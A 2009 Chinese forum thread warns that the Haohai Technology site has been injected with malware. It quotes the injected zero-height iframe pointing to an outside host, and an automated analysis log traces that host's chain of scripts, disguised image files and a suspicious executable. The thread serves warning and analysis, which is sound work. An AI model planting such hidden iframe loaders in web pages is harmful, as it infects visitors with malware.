hxxp://www.hhghost.com/【被挂马】( 主页面没被挂 by IllusionWing)

天使的愤怒

各位朋友：
你们好！
如果你们近期要上浩海技术的官网的话，请小心！浩海技术的官网已被植入挂马代码！请开启大蜘蛛实时监控并升级到最新版本的病毒库，以防自己的虚拟财产受到损失！
浩海技术官网：hxxp://www.hhghost.com/【被挂马】
挂马代码：
<iframe src="http://fghjk1.9966.org/oday/09165/index.htm" width=100 height=0></iframe>


[ 本帖最后由 bc123 于 2009-8-26 11:54 编辑 ]

IllusionWing

没发现挂马。8过那iframe有马儿是事实。。

原始 - http://fghjk1.9966.org/oday/09165/index.htm
开始自动解析 - http://fghjk1.9966.org/oday/09165/index.htm
L1 - http://fghjk1.9966.org/oday/09165/Td14.htm
L1 - http://fghjk1.9966.org/oday/09165/yt.htm
L1 - http://fghjk1.9966.org/oday/09165/dxxz.htm
L1 - http://fghjk1.9966.org/oday/09165/yut.htm
L2 - http://fghjk1.9966.org/oday/09165/14.js
L2 - http://fghjk1.9966.org/oday/09165/15.js
L2 - http://fghjk1.9966.org/oday/09165/16.js
L2 - http://fghjk1.9966.org/oday/09165/a.jpg
L2 - http://fghjk1.9966.org/oday/09165/b.jpg
L2 - http://fghjk1.9966.org/oday/09165/url.jpg
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L2 - http://fghjk1.9966.org/oday/09165/c.jpg
L2 - http://fghjk1.9966.org/oday/09165/d.jpg
L2 - http://fghjk1.9966.org/oday/09165/e.jpg
L2 - http://fghjk1.9966.org/oday/09165/f.jpg
L2 - http://fghjk1.9966.org/oday/09165/091.js
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L2 - http://fghjk1.9966.org/oday/09165/092.js
L2 - http://fghjk1.9966.org/oday/09165/ytfl.htm
L2 - http://fghjk1.9966.org/oday/09165/ytfl1.htm
L2 - http://fghjk1.9966.org/oday/09165/of.htm
关注 - http://fghjk1.9966.org/oday/09165/09165.exe
L3 - http://fghjk1.9966.org/oday/09165/s1;o2.click}
L3 - http://fghjk1.9966.org/oday/09165/y1.htm
L3 - http://fghjk1.9966.org/oday/09165/t2.htm
L3 - http://fghjk1.9966.org/oday/09165/of.js
自动解析 - Auto XOR - 高度可疑 - http://fghjk1.9966.org/oday/09165/09165.exe
L3 - http://fghjk1.9966.org/oday/09165/of1.css

输出的对象 - http://fghjk1.9966.org/oday/09165/09165.exe

此分析日志由 Illusion Wing 使用 Astox v1 Build 1100 在 2009年8月26日12时32分15秒 生成。

weijinkun4

avast有马报告

Hopesky

RPWT大爆发...

读取代码失败~